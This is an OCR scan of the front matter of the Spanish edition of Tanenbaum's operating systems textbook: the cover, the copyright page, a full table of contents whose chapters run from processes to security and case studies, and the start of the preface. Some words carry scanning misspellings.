
Ronda 
. robín ¡ 


Sistema 

multihilo 


Sistema operativo 
móvil _ 


Cliente 

delgado 


Región ^ 
crítica 

Mecanismo de ' 

Intruso 


Interblogueo' 


Encarcelamiento 


Spyware * 
y Seguridad 


Balance 
de carga 


Pantalla azul 
de la muerte 


Salida 


Caballo 


de troya 
3 Entrada^ 


Programador 
de procesos 


Subsistema 
de memoria, 


Sistema 

embebido 


Mgoritmo dff 
la avestruz 


Virtualización 


Carrera 


Multimedia 


Interrupción 

Administración 
de energía 


{íSCompresión 
de video 


Servidor 


Iniciar la 
computadora 


ANDREWS/ 

TANENBAUM 


desboi^ 
damiento 
hde bufer 


t Sistema 
Linux de 
doble núcleo 


Cliente 


SISTEMAS 

OPERATIVOS 

MODERNOS 


3^ edición 


PEARSON 


r ,s 


i A ' 



li'l C^naáe 


jS)> fíléeofos . 

















SISTEMAS OPERATIVOS 
MODERNOS 

TERCERA EDICIÓN 



SISTEMAS OPERATIVOS 
MODERNOS 

TERCERA EDICIÓN 


ANDREW S. TANENBAUM 

Vrije Universiteit 
Amsterdam, Holanda 


TRADUCCIÓN 

Alfonso Vidal Romero Elizondo 

Ingeniero en Sistemas Computacionales 
Instituto Tecnológico y de Estudios Superiores de Monterrey 
Campus Monterrey 


REVISIÓN TÉCNICA 

José Ramón Ríos Sánchez 

Departamento Académico de Computación 
Instituto Tecnológico Autónomo de México 

Aarón Jiménez Govea 

Catedrático del Departamento de Ciencias Computacionales 
Universidad de Guadalajara, México 


PEARSON 


cae 



México • Argentina • Brasil • Colombia • Costa Rica • Chile • Ecuador 
España ■ Guatemala ■ Panamá • Perú • Puerto Rico • Uruguay "Venezuela 




Datos de catalogación bibliográfica 


TANENBAUM, ANDREW S. 

Sistemas operativos modernos. Tercera edición 

PEARSON EDUCACIÓN, México, 2009 

ISBN: 978-607-442-046-3 
Area: Computación 

Formato: 18.5 x 23.5 cm Páginas: 1104 


Authorized translation from the English language edition, entitled Modern operating systems, 3rd edition, by Andrew S. 
Tanenbaum published by Peai'son Education, Inc., publishing as PRENTICE HALL, INC., Copyright © 2008. 

All rights reserved. 

ISBN 9780136006633 

Traducción autorizada de la edición en idioma inglés, titulada Modern operating systems, 3“. edición por Andrew S. 
Tanenbaum, publicada por Pearson Education, Inc., publicada como PRENTICE HALL, INC., Copyright © 2008. 

Todos ios derechos reservados. 

Esta edición en español es la única autorizada. 

Edición en español 

Editor: Luis Miguel Cruz Castillo 

e-mail:luis. cruz@pearsoned.com 
Editor de desaiTollo: Bernai'dino Gutiérrez Hernández 
Supervisor de producción: José D. Hernández Garduño 

Edición en inglés 

Editorial Director, Computer Science, Engineering, 
and Advanced Mathematics: Marcia J. Norton 
Executive Editor: Tracy Dunkelberger 
Editorial Assistant: Melinda Haggerty 
Associtate Editor: ReeAnne Davis 
Sénior Managing Editor: Scott Disanno 
Production Editor: Irwin Zucker 

Cover Concept: Andrews S. Tanenbaum and Tracy Dunkelberger 
Cover Design: Tamara Newman 

TERCERA EDICIÓN, 2009 

D.R. © 2009 por Pearson Educación de México, S.A. de C.V. 

Atlacomulco 500-5o. piso 
Col. Industrial Atoto 

53519, Naucalpan de Juárez, Estado de México 
Cámara Nacional de la Industria Editorial Mexicana. Reg. Núm. 1031. 

Prentice Hall es una marca registrada de Pearson Educación de México, S.A. de C.V. 

Reservados todos los derechos. Ni la totalidad ni parte de esta publicación pueden reproducirse, registrarse o transmitirse, 
por un sistema de recuperación de información, en ninguna forma ni por ningún medio, sea electrónico, mecánico, foto- 
químico, magnético o electroóptico, por fotocopia, grabación o cualquier otro, sin permiso previo por escrito del editor. 

El préstamo, alquiler o cualquier otra forma de cesión de uso de este ejemplar requirirá también la autorización del editor 
o de sus representantes. 

ISBN: 978-607-442-046-3 
Impreso en México. Printed in México. 

1234567890 09 10 11 12 


PEARSON 


cae 



Cover Illustrator: Steve Lefkowitz 
Interior design: Andrew S. Tanenbaum 
Typesetting: Andrew S. Tanenbaum 
Art Director: Kenny Beck 
Alt Editor: Gregory Bulles 
Media Editor: David Alick 
Manufacturing Manager: Alan Fischer 
Manufacturing Buyer: Lisa McDowell 
Marketing Manager: Mack Patterson 









Para Suzanne, Barbara, Marvin y ala memoria de Bram y Sweetie tt 



CONTENIDO 


PREFACIO 


1 INTRODUCCIÓN 

1.1 ¿QUÉ ES UN SISTEMA OPERATIVO? 3 

1.1.1 El sistema operativo como una máquina extendida 4 

1.1.2 El sistema operativo como administrador de recursos 6 

1.2 HISTORIA DE LOS SISTEMAS OPERATIVOS 7 

1.2.1 La primera generación (1945 a 1955): tubos al vacío 7 

1.2.2 La segunda generación (1955 a 1965): transistores 
y sistemas de procesamiento por lotes 8 

1.2.3 La tercera generación (1965 a 1980): circuitos integrados 
y multiprogramación 10 

1.2.4 La cuarta generación (1980 a la fecha): 
las computadoras personales 15 

1.3 REVISIÓN DEL HARDWARE DE COMPUTADORA 19 

1.3.1 Procesadores 19 

1.3.2 Memoria 23 

1.3.3 Discos 26 

1.3.4 Cintas 27 

1.3.5 Dispositivos de E/S 27 

1.3.6 Buses 30 

1.3.7 Arranque de la computadora 33 


vii 


xxiv 


1 


viii 


1.4 LOS TIPOS DE SISTEMAS OPERATIVOS 33 

1.4.1 Sistemas operativos de mainframe 34 

1.4.2 Sistemas operativos de servidores 34 

1.4.3 Sistemas operativos de multiprocesadores 34 

1.4.4 Sistemas operativos de computadoras personales 35 

1.4.5 Sistemas operativos de computadoras de bolsillo 35 

1.4.6 Sistemas operativos integrados 35 

1.4.7 Sistemas operativos de nodos sensores 36 

1.4.8 Sistemas operativos en tiempo real 36 

1.4.9 Sistemas operativos de tarjetas inteligentes 37 

1.5 CONCEPTOS DE LOS SISTEMAS OPERATIVOS 37 

1.5.1 Procesos 38 

1.5.2 Espacios de direcciones 40 

1.5.3 Archivos 40 

1.5.4 Entrada/salida 43 

1.5.5 Protección 44 

1.5.6 El Shell 44 

1.5.7 La ontogenia recapitula la filogenia 46 

1.6 LLAMADAS AL SISTEMA 49 

1.6.1 Llamadas al sistema para la administración de procesos 52 

1.6.2 Llamadas al sistema para la administración de archivos 56 

1.6.3 Llamadas al sistema para la administración de directorios 57 

1.6.4 Miscelánea de llamadas al sistema 58 

1.6.5 La API Win32 de Windows 59 

1.7 ESTRUCTURA DE UN SISTEMA OPERATIVO 62 

1.7.1 Sistemas monolíticos 62 

1.7.2 Sistemas de capas 63 

1.7.3 Microkernels 64 

1.7.4 Modelo cliente-servidor 67 

1.7.5 Máquinas virtuales 67 

1.7.6 Exokernels 71 

1.8 EL MUNDO SEGÚN C 72 

1.8.1 El lenguaje C 72 

1.8.2 Archivos de encabezado 73 

1.8.3 Proyectos de programación extensos 74 

1.8.4 El modelo del tiempo de ejecución 75 

1.9 INVESTIGACIÓN ACERCA DE LOS SISTEMAS OPERATIVOS 

1.10 DESCRIPCIÓN GENERAL SOBRE EL RESTO DE ESTE LIBRO 


CONTENIDO 


76 

77 


CONTENIDO 


1.11 UNIDADES MÉTRICAS 78 

1.12 RESUMEN 79 

2 PROCESOS E HILOS 

2.1 PROCESOS 83 

2.1.1 El modelo del proceso 84 

2.1.2 Creación de un proceso 86 

2.1.3 Terminación de procesos 88 

2.1.4 Jerarquías de procesos 89 

2.1.5 Estados de un proceso 90 

2.1.6 Implementación de los procesos 91 

2.1.7 Modelación de la multiprogramación 93 

2.2 HILOS 95 

2.2.1 Uso de hilos 95 

2.2.2 El modelo clásico de hilo 100 

2.2.3 Hilos en POSIX 104 

2.2.4 Implementación de hilos en el espacio de usuario 

2.2.5 Implementación de hilos en el kernel 109 

2.2.6 Implementaciones híbridas 110 

2.2.7 Activaciones del planificador 111 

2.2.8 Hilos emergentes 112 

2.2.9 Conversión de código de hilado simple a multihilado 

2.3 COMUNICACIÓN ENTRE PROCESOS 117 

2.3.1 Condiciones de carrera 117 

2.3.2 Regiones críticas 119 

2.3.3 Exclusión mutua con espera ocupada 120 

2.3.4 Dormir y despertar 125 

2.3.5 Semáforos 128 

2.3.6 Mutexes 130 

2.3.7 Monitores 134 

2.3.8 Pasaje (transmisión) de mensajes 140 

2.3.9 Barreras 144 

2.4 PLANIEICACIÓN 145 

2.4.1 Introducción a la planificación 145 

2.4.2 Planificación en sistemas de procesamiento por lotes 

2.4.3 Planificación en sistemas interactivos 154 

2.4.4 Planificación en sistemas de tiempo real 160 


X 


CONTENIDO 


2.4.5 Política contra mecanismo 161 

2.4.6 Planificación de hilos 162 

2.5 PROBLEMAS CLÁSICOS DE COMUNICACIÓN 
ENTRE PROCESOS (IPC) 163 

2.5.1 El problema de los filósofos comelones 164 

2.5.2 El problema de los lectores y escritores 167 

2.6 INVESTIGACIÓN ACERCA DE LOS PROCESOS E HILOS 168 

2.7 RESUMEN 169 


3 ADMINISTRACIÓN DE MEMORIA 

3.1 SIN ABSTRACCIÓN DE MEMORIA 176 

3.2 UNA ABSTRACCIÓN DE MEMORIA: 

ESPACIOS DE DIRECCIONES 179 

3.2.1 La noción de un espacio de direcciones 180 

3.2.2 Intercambio 181 

3.2.3 Administración de memoria libre 184 

3.3 MEMORIA VIRTUAL 188 

3.3.1 Paginación 189 

3.3.2 Tablas de páginas 193 

3.3.3 Aceleración de la paginación 194 

3.3.4 Tablas de páginas para memorias extensas 198 

3.4 ALGORITMOS DE REEMPLAZO DE PÁGINAS 201 

3.4.1 El algoritmo de reemplazo de páginas óptimo 202 

3.4.2 El algoritmo de reemplazo de páginas: no usadas 
recientemente 203 

3.4.3 El algoritmo de reemplazo de páginas: 

Primera en entrar, primera en salir (PIPO) 204 

3.4.4 El algoritmo de reemplazo de páginas: segunda oportunidad 204 

3.4.5 El algoritmo de reemplazo de páginas: reloj 205 

3.4.6 El algoritmo de reemplazo de páginas: 
menos usadas recientemente (LRU) 206 

3.4.7 Simulación de LRU en software 207 

3.4.8 El algoritmo de reemplazo de páginas: conjunto de trabajo 209 

3.4.9 El algoritmo de reemplazo de páginas WSClock 213 

3.4.10 Resumen de los algoritmos de reemplazo de páginas 215 


175 


CONTENIDO 


XI 


3.5 CUESTIONES DE DISEÑO PARA 

LOS SISTEMAS DE PAGINACIÓN 216 

3.5.1 Políticas de asignación local contra las de asignación global 216 

3.5.2 Control de carga 218 

3.5.3 Tamaño de página 219 

3.5.4 Espacios separados de instrucciones y de datos 221 

3.5.5 Páginas compartidas 221 

3.5.6 Bibliotecas compartidas 223 

3.5.7 Archivos asociados 225 

3.5.8 Política de limpieza 226 

3.5.9 Interfaz de memoria virtual 226 

3.6 CUESTIONES DE IMPLEMENTACIÓN 227 

3.6.1 Participación del sistema operativo en la paginación 227 

3.6.2 Manejo de fallos de página 228 

3.6.3 Respaldo de instrucción 229 

3.6.4 Bloqueo de páginas en memoria 230 

3.6.5 Almacén de respaldo 231 

3.6.6 Separación de política y mecanismo 233 

3.7 SEGMENTACIÓN 234 

3.7.1 Implementación de segmentación pura 237 

3.7.2 Segmentación con paginación: MULTICS 238 

3.7.3 Segmentación con paginación: Intel Pentium 242 

3.8 INVESTIGACIÓN ACERCA DE LA ADMINISTRACIÓN 
DE MEMORIA 247 

3.9 RESUMEN 248 


4 SISTEMAS DE ARCHIVOS 

4.1 ARCHIVOS 257 

4.1.1 Nomenclatura de archivos 257 

4.1.2 Estructura de archivos 259 

4.1.3 Tipos de archivos 260 

4.1.4 Acceso a archivos 262 

4.1.5 Atributos de archivos 263 

4.1.6 Operaciones de archivos 264 

4.1.7 Un programa de ejemplo que utiliza llamadas al sistema 
de archivos 265 


255 


Xll 


CONTENIDO 


4.2 DIRECTORIOS 268 

4.2.1 Sistemas de directorios de un solo nivel 268 

4.2.2 Sistemas de directorios jerárquicos 268 

4.2.3 Nombres de rutas 269 

4.2.4 Operaciones de directorios 272 

4.3 IMPLEMENTACIÓN DE SISTEMAS DE ARCHIVOS 273 

4.3.1 Distribución del sistema de archivos 273 

4.3.2 Implementación de archivos 274 

4.3.3 Implementación de directorios 280 

4.3.4 Archivos compartidos 283 

4.3.5 Sistemas de archivos estructurados por registro 285 

4.3.6 Sistemas de archivos por bitácora 287 

4.3.7 Sistemas de archivos virtuales 288 

4.4 ADMINISTRACIÓN Y OPTIMIZACIÓN 
DE SISTEMAS DE ARCHIVOS 292 

4.4.1 Administración del espacio en disco 292 

4.4.2 Respaldos del sistema de archivos 298 

4.4.3 Consistencia del sistema de archivos 304 

4.4.4 Rendimiento del sistema de archivos 307 

4.4.5 Desfragmentación de discos 311 

4.5 EJEMPLOS DE SISTEMAS DE ARCHIVOS 312 

4.5.1 Sistemas de archivos de CD-ROM 312 

4.5.2 El sistema de archivos MS-DOS 318 

4.5.3 El sistema de archivos V7 de UNIX 321 

4.6 INVESTIGACIÓN ACERCA DE LOS SISTEMAS 
DE ARCHIVOS 324 

4.7 RESUMEN 324 


5 ENTRADA/SALIDA 

5.1 PRINCIPIOS DEL HARDWARE DE E/S 329 

5.1.1 Dispositivos de E/S 330 

5.1.2 Controladores de dispositivos 331 

5.1.3 E/S por asignación de memoria 332 

5.1.4 Acceso directo a memoria (DMA) 336 

5.1.5 Repaso de las interrupciones 339 


329 


CONTENIDO 


Xlll 


5.2 FUNDAMENTOS DEL SOETWARE DE E/S 343 

5.2.1 Objetivos del software de E/S 343 

5.2.2 E/S programada 344 

5.2.3 E/S controlada por interrupciones 346 

5.2.4 E/S mediante el uso de DMA 347 

5.3 CAPAS DEL SOETWARE DE E/S 348 

5.3.1 Manejadores de interrupciones 348 

5.3.2 Drivers de dispositivos 349 

5.3.3 Software de E/S independiente del dispositivo 353 

5.3.4 Software de E/S en espacio de usuario 359 

5.4 DISCOS 360 

5.4.1 Hardware de disco 361 

5.4.2 Eormato de disco 376 

5.4.3 Algoritmos de programación del brazo del disco 379 

5.4.4 Manejo de errores 382 

5.4.5 Almacenamiento estable 385 

5.5 RELOJES 388 

5.5.1 Hardware de reloj 388 

5.5.2 Software de reloj 390 

5.5.3 Temporizadores de software 393 

5.6 INTEREACES DE USUARIO; TECLADO, 

RATÓN, MONITOR 394 

5.6.1 Software de entrada 394 

5.6.2 Software de salida 399 

5.7 CLIENTES DELGADOS 415 

5.8 ADMINISTRACIÓN DE ENERGÍA 417 

5.8.1 Cuestiones de hardware 418 

5.8.2 Cuestiones del sistema operativo 419 

5.8.3 Cuestiones de los programas de aplicaciones 424 

5.9 INVESTIGACIÓN ACERCA DE LA E/S 425 

5.10 RESUMEN 426 


6 INTERBLOQUEOS 


433 


6.1 RECURSOS 434 


XIV 


6.1.1 Recursos apropiativos y no apropiativos 434 

6.1.2 Adquisición de recursos 435 


CONTENIDO 


6.2 INTRODUCCIÓN A LOS INTERBLOQUEOS 437 

6.2.1 Condiciones para los interbloqueos de recursos 438 

6.2.2 Modelado de interbloqueos 438 

6.3 EL ALGORITMO DE LA AVESTRUZ 441 

6.4 DETECCIÓN Y RECUPERACIÓN DE UN INTERBLOQUEO 442 

6.4.1 Detección de interbloqueos con un recurso de cada tipo 442 

6.4.2 Detección del interbloqueo con varios recursos de cada tipo 444 

6.4.3 Recuperación de un interbloqueo 447 

6.5 CÓMO EVITAR INTERBLOQUEOS 448 

6.5.1 Trayectorias de los recursos 449 

6.5.2 Estados seguros e inseguros 450 

6.5.3 El algoritmo del banquero para un solo recurso 451 

6.5.4 El algoritmo del banquero para varios recursos 452 

6.6 CÓMO PREVENIR INTERBLOQUEOS 454 

6.6.1 Cómo atacar la condición de exclusión mutua 454 

6.6.2 Cómo atacar la condición de contención y espera 455 

6.6.3 Cómo atacar la condición no apropiativa 455 

6.6.4 Cómo atacar la condición de espera circular 456 

6.7 OTRAS CUESTIONES 457 

6.7.1 Bloqueo de dos fases 457 

6.7.2 Interbloqueos de comunicaciones 458 

6.7.3 Bloqueo activo 459 

6.7.4 Inanición 461 

6.8 INVESTIGACIÓN SOBRE LOS INTERBLOQUEOS 461 

6.9 RESUMEN 462 


7 SISTEMAS OPERATIVOS MULTIMEDIA 

7.1 INTRODUCCIÓN A MULTIMEDIA 468 

7.2 ARCHIVOS DE MULTIMEDIA 472 
7.2.1 Codificación de video 473 


467 


CONTENIDO 


XV 


7.2.2 Codificación de audio 476 

7.3 COMPRESIÓN DE VIDEO 478 

7.3.1 El estándar JPEG 478 

7.3.2 El estándar MPEG 481 

7.4 COMPRESIÓN DE AUDIO 484 

7.5 PROGRAMACIÓN DE PROCESOS MULTIMEDIA 487 

7.5.1 Procesos de programación homogéneos 488 

7.5.2 Programación general en tiempo real 488 

7.5.3 Programación monotónica en frecuencia 490 

7.5.4 Programación del menor tiempo de respuesta primero 491 

7.6 PARADIGMAS DE LOS SISTEMAS DE ARCHIVOS MULTIMEDIA 493 

7.6.1 Funciones de control de VCR 494 

7.6.2 Video casi bajo demanda 496 

7.6.3 Video casi bajo demanda con funciones de VCR 498 

7.7 COLOCACIÓN DE LOS ARCHIVOS 499 

7.7.1 Colocación de un archivo en un solo disco 500 

7.7.2 Dos estrategias alternativas de organización de archivos 501 

7.7.3 Colocación de archivos para el video casi bajo demanda 504 

7.7.4 Colocación de varios archivos en un solo disco 506 

7.7.5 Colocación de archivos en varios discos 508 

7.8 USO DE CACHÉ 510 

7.8.1 Caché de bloque 511 

7.8.2 Caché de archivo 512 

7.9 PROGRAMACIÓN DE DISCOS PARA MULTIMEDIA 513 

7.9.1 Programación de discos estática 513 

7.9.2 Programación de disco dinámica 515 

7.10 INVESTIGACIÓN SOBRE MULTIMEDIA 516 

7.11 RESUMEN 517 


8 SISTEMAS DE MÚLTIPLES PROCESADORES 523 

8.1 MULTIPROCES ADORES 526 

8.1.1 Hardware de multiprocesador 526 


XVI 


CONTENIDO 


8.1.2 Tipos de sistemas operativos multiprocesador 534 

8.1.3 Sincronización de multiprocesadores 538 

8.1.4 Planificación de multiprocesadores 542 

8.2 MULTICOMPUTADORAS 548 

8.2.1 Hardware de una multicomputadora 549 

8.2.2 Software de comunicación de bajo nivel 553 

8.2.3 Software de comunicación a nivel de usuario 555 

8.2.4 Llamada a procedimiento remoto 558 

8.2.5 Memoria compartida distribuida 560 

8.2.6 Planificación de multicomputadoras 565 

8.2.7 Balanceo de carga 565 

8.3 VIRTUALIZACIÓN 568 

8.3.1 Requerimientos para la virtualización 570 

8.3.2 Hipervisores de tipo 1 571 

8.3.3 Hipervisores de tipo 2 572 

8.3.4 Paravirtualización 574 

8.3.5 Virtualización de la memoria 576 

8.3.6 Virtualización de la E/S 578 

8.3.7 Dispositivos virtuales 579 

8.3.8 Máquinas virtuales en CPUs de multinúcleo 579 

8.3.9 Cuestiones sobre licencias 580 

8.4 SISTEMAS DISTRIBUIDOS 580 

8.4.1 Hardware de red 583 

8.4.2 Protocolos y servicios de red 586 

8.4.3 Middleware basado en documentos 590 

8.4.4 Middleware basado en sistemas de archivos 591 

8.4.5 Middleware basado en objetos 596 

8.4.6 Middleware basado en coordinación 598 

8.4.7 Grids (Mallas) 603 

8.5 INVESTIGACIÓN SOBRE LOS SISTEMAS 
DE MÚLTIPLES PROCESADORES 604 

8.6 RESUMEN 605 


9 SEGURIDAD 


611 


9.1 EL ENTORNO DE SEGURIDAD 613 

9.1.1 Amenazas 613 


CONTENIDO 


xvii 


9.1.2 Intrusos 615 

9.1.3 Pérdida accidental de datos 616 

9.2 FUNDAMENTOS DE LA CRIPTOGRAEÍA (CIERADO) 616 

9.2.1 Criptografía de clave secreta 617 

9.2.2 Criptografía de clave pública 618 

9.2.3 Punciones de una vía 619 

9.2.4 Pirmas digitales 619 

9.2.5 Módulo de plataforma confiable 621 

9.3 MECANISMOS DE PROTECCIÓN 622 

9.3.1 Domitúos de protección 622 

9.3.2 Listas de control de acceso 624 

9.3.3 Capacidades 627 

9.3.4 Sistemas confiables 630 

9.3.5 Base de cómputo confiable 631 

9.3.6 Modelos formales de los sistemas seguros 632 

9.3.7 Seguridad multinivel 634 

9.3.8 Canales encubiertos 637 

9.4 AUTENTICACIÓN 641 

9.4.1 Autenticación mediante el uso de contraseñas 642 

9.4.2 Autenticación mediante el uso de un objeto físico 651 

9.4.3 Autenticación mediante biométrica 653 

9.5 ATAQUES DESDE EL INTERIOR 656 

9.5.1 Bombas lógicas 656 

9.5.2 Trampas 657 

9.5.3 Suplantación de identidad en el inicio de sesión 658 

9.6 CÓMO EXPLOTAR LOS ERRORES (BUGS) EN EL CÓDIGO 659 

9.6.1 Ataques de desbordamiento del búfer 660 

9.6.2 Ataques mediante cadenas de formato 662 

9.6.3 Ataques de retorno a libe 664 

9.6.4 Ataques por desbordamiento de enteros 665 

9.6.5 Ataques por inyección de código 666 

9.6.6 Ataques por escalada de privilegios 667 

9.7 MALWARE 667 

9.7.1 Caballos de Troya (troyanos) 670 

9.7.2 Virus 672 

9.7.3 Gusanos 682 

9.7.4 Spyware 684 

9.7.5 Rootkits 688 


XVlll 


CONTENIDO 


9.8 DEFENSAS 692 

9.8.1 Firewalls 693 

9.8.2 Los antivirus y las técnicas anti-antivirus 695 

9.8.3 Firma de código 701 

9.8.4 Encarcelamiento 702 

9.8.5 Detección de intrusos basada en modelos 703 

9.8.6 Encapsulamiento de código móvil 705 

9.8.7 Seguridad de Java 709 

9.9 INVESTIGACIÓN SOBRE LA SEGURIDAD 711 

9.10 RESUMEN 712 


10 CASO DE ESTUDIO 1: LINUX 

10.1 HISTORIA DE UNIX Y LINUX 720 

10.1.1 UNICS 720 

10.1.2 UNIX EN LA PDF-11 721 

10.1.3 UNIX portable 722 

10.1.4 Berkeley UNIX 723 

10.1.5 UNIX estándar 724 

10.1.6 MINIX 725 

10.1.7 Linux 726 

10.2 GENERALIDADES SOBRE LINUX 728 

10.2.1 Objetivos de Linux 729 

10.2.2 Interfaces para Linux 730 

10.2.3 El Shell 731 

10.2.4 Programas utilitarios de Linux 734 

10.2.5 Estructura del kernel 736 

10.3 LOS PROCESOS EN LINUX 739 

10.3.1 Conceptos fundamentales 739 

10.3.2 Llamadas al sistema para administrar procesos en Linux 741 

10.3.3 Implementación de procesos e hilos en Linux 745 

10.3.4 Planificación en Linux 752 

10.3.5 Arranque de Linux 755 

10.4 ADMINISTRACIÓN DE LA MEMORIA EN LINUX 758 

10.4.1 Conceptos fundamentales 758 

10.4.2 Llamadas al sistema de administración de memoria en Linux 761 


719 


CONTENIDO 

10.4.3 Implementación de la administración de la memoria 
en Linux 762 

10.4.4 La paginación en Linux 768 

10.5 ENTRADA/SALIDA EN LINUX 771 

10.5.1 Conceptos fundamentales 772 

10.5.2 Redes 773 

10.5.3 Llamadas al sistema de Entrada/Salida en Linux 775 

10.5.4 Implementación de la entrada/salida en Linux 775 

10.5.5 Los módulos en Linux 779 

10.6 EL SISTEMA DE ARCHIVOS DE LINUX 779 

10.6.1 Conceptos fundamentales 780 

10.6.2 Llamadas al sistema de archivos en Linux 785 

10.6.3 Implementación del sistema de archivos de Linux 788 

10.6.4 NES; El sistema de archivos de red 796 

10.7 LA SEGURIDAD EN LINUX 803 

10.7.1 Conceptos fundamentales 803 

10.7.2 Llamadas al sistema de seguridad en Linux 805 

10.7.3 Implementación de la seguridad en Linux 806 

10.8 RESUMEN 806 


xix 


11 CASO DE ESTUDIO 2: WINDOWS VISTA 813 

11.1 HISTORIA DE WINDOWS VISTA 813 

11.1.1 1980: MS-DOS 814 

11.1.2 1990: Windows basado en MS-DOS 815 

11.1.3 2000: Windows basado en NT 815 

11.1.4 Windows Vista 818 

11.2 PROGRAMACIÓN DE WINDOWS VISTA 819 

11.2.1 La Interfaz de programación de aplicaciones de NT nativa 822 

11.2.2 La interfaz de programación de aplicaciones Win32 825 

11.2.3 El registro de Windows 829 

11.3 ESTRUCTURA DEL SISTEMA 831 

11.3.1 Estructura del sistema operativo 832 

11.3.2 Booteo de Windows Vista 847 

11.3.3 Implementación del administrador de objetos 848 

11.3.4 Subsistemas, DLLs y servicios en modo de usuario 858 


XX 


CONTENIDO 


11.4 PROCESOS E HILOS EN WINDOWS VISTA 861 

11.4.1 Conceptos fundamentales 861 

11.4.2 Llamadas a la API para administrar trabajos, procesos, 
hilos y fibras 866 

11.4.3 Implementación de procesos e hilos 871 

11.5 ADMINISTRACIÓN DE LA MEMORIA 879 

11.5.1 Conceptos fundamentales 879 

11.5.2 Llamadas al sistema para administrar la memoria 884 

11.5.3 Implementación de la administración de memoria 885 

11.6 USO DE LA CACHÉ EN WINDOWS VISTA 894 

11.7 ENTRADA/SALIDA EN WINDOWS VISTA 896 

11.7.1 Conceptos fundamentales 897 

11.7.2 Llamadas a la API de entrada/salida 898 

11.7.3 Implementación de la E/S 901 

11.8 EL SISTEMA DE ARCHIVOS NT DE WINDOWS 906 

11.8.1 Conceptos fundamentales 907 

11.8.2 Implementación del sistema de archivos NT 908 

11.9 LA SEGURIDAD EN WINDOWS VISTA 918 

11.9.1 Conceptos fundamentales 919 

11.9.2 Llamadas a la API de seguridad 921 

11.9.3 Implementación de la seguridad 922 

11.10 RESUMEN 924 


12 CASO DE ESTUDIO 3: SYMBIAN OS 

12.1 LA HISTORIA DE SYMBIAN OS 930 

12.1.1 Raíces de Symbian OS: Psion y EPOC 930 

12.1.2 Symbian OS versión 6 931 

12.1.3 Symbian OS versión 7 932 

12.1.4 Symbian OS en la actualidad 932 

12.2 GENERALIDADES SOBRE SYMBIAN OS 932 

12.2.1 Orientación a objetos 933 

12.2.2 Diseño del microkernel 934 

12.2.3 El nanokernel de Symbian OS 935 

12.2.4 Acceso a los recursos de cliente/servidor 935 


929 


CONTENIDO 


12.2.5 Características de un sistema operativo más grande 936 

12.2.6 Comunicaciones y multimedia 937 


XXI 


12.3 PROCESOS E HILOS EN SYMBIAN OS 937 

12.3.1 Hilos y nanohilos 938 

12.3.2 Procesos 939 

12.3.3 Objetos activos 939 

12.3.4 Comunicación entre procesos 940 

12.4 ADMINISTRACIÓN DE LA MEMORIA 941 

12.4.1 Sistemas sin memoria virtual 941 

12.4.2 Cómo direcciona Symbian OS la memoria 943 

12.5 ENTRADA Y SALIDA 945 

12.5.1 Drivers de dispositivos 945 

12.5.2 Extensiones del kernel 946 

12.5.3 Acceso directo a la memoria 946 

12.5.4 Caso especial: medios de almacenamiento 947 

12.5.5 Bloqueo de E/S 947 

12.5.6 Medios removibles 948 

12.6 SISTEMAS DE ALMACENAMIENTO 948 

12.6.1 Sistemas de archivos para dispositivos móviles 948 

12.6.2 Sistemas de archivos de Symbian OS 949 

12.6.3 Seguridad y protección del sistema de archivos 949 

12.7 LA SEGURIDAD EN SYMBIAN OS 950 

12.8 LA COMUNICACIÓN EN SYMBIAN OS 953 

12.8.1 Infraestructura básica 953 

12.8.2 Un análisis más detallado de la infraestructura 954 

12.9 RESUMEN 957 


13 DISEÑO DE SISTEMAS OPERATIVOS 

13.1 LA NATURALEZA DEL PROBLEMA DE DISEÑO 960 

13.1.1 Objetivos 960 

13.1.2 ¿Por qué es difícil diseñar un sistema operativo? 961 

13.2 DISEÑO DE INTEREACES 963 

13.2.1 Principios de guía 963 


959 


xxii 


13.2.2 Paradigmas 965 

13.2.3 La interfaz de llamadas al sistema 968 

13.3 IMPLEMENTACIÓN 971 

13.3.1 Estructura del sistema 971 

13.3.2 Comparación entre mecanismo y directiva 975 

13.3.3 Ortogonalidad 976 

13.3.4 Nomenclatura 977 

13.3.5 Tiempo de vinculación 978 

13.3.6 Comparación entre estructuras estáticas y dinámicas 979 

13.3.7 Comparación entre la implementación de arriba-abajo 
y la implementación de abajo-arriba 980 

13.3.8 Técnicas útiles 981 

13.4 RENDIMI E NTO 987 

13.4.1 ¿Por qué son lentos los sistemas operativos? 987 

13.4.2 ¿Qué se debe optimizar? 988 

13.4.3 Concesiones entre espacio y tiempo 988 

13.4.4 Uso de caché 991 

13.4.5 Sugerencias 992 

13.4.6 Explotar la localidad 993 

13.4.7 Optimizar el caso común 993 

13.5 ADMINISTRACIÓN DE PROYECTOS 994 

13.5.1 El mítico hombre-mes 994 

13.5.2 Estructura de equipos 995 

13.5.3 La función de la experiencia 997 

13.5.4 Sin bala de plata 998 

13.6 TENDENCIAS EN EL DISEÑO DE SISTEMAS OPERATIVOS 

13.6.1 Virtualización 999 

13.6.2 Chips multinúcleo 999 

13.6.3 Sistemas operativos con espacios de direcciones extensos 

13.6.4 Redes 1000 

13.6.5 Sistemas paralelos y distribuidos 1001 

13.6.6 Multimedia 1001 

13.6.7 Computadoras operadas por baterías 1002 

13.6.8 Sistemas embebidos 1002 

13.6.9 Nodos de monitoreo 1003 


CONTENIDO 


998 

1000 


13.7 RESUMEN 1003 


CONTENIDO 


XXlll 


14 LISTA DE LECTURAS Y BIBLIOGRAFÍA 

14.1 SUGERENCIAS PARA CONTINUAR LA LECTURA 1007 

14.1.1 Introducción y obras generales 1008 

14.1.2 Procesos e hilos 1008 

14.1.3 Administración de la memoria 1009 

14.1.4 Entrada/salida 1009 

14.1.5 Sistemas de archivos 1010 

14.1.6 Interbloqueos 1010 

14.1.7 Sistemas operativos multimedia 1010 

14.1.8 Sistemas con varios procesadores 1011 

14.1.9 Seguridad 1012 

14.1.10 Linux 1014 

14.1.11 Windows Vista 1014 

14.1.12 El sistema operativo Symbian 1015 

14.1.13 Principios de diseño 1015 

14.2 BIBLIOGRAEÍA EN ORDEN ALEABÉTICO 1016 


ÍNDICE 


1007 


1049 


PREFACIO 


La tercera edición de este libro difiere de la segunda en muchos aspectos. Para empezar, reordena¬ 
mos los capítulos para colocar el material central al principio. También pusimos mayor énfasis en 
el sistema operativo como el creador de las abstracciones. El capítulo 1, se ha actualizado en forma 
considerable y ofrece una introducción de todos los conceptos; el capítulo 2 trata sobre la abstrac¬ 
ción de la CPU en varios procesos; el 3 aborda la abstracción de la memoria física en espacios de 
direcciones (memoria virtual); el 4 versa sobre la abstracción del disco en archivos. En conjunto, 
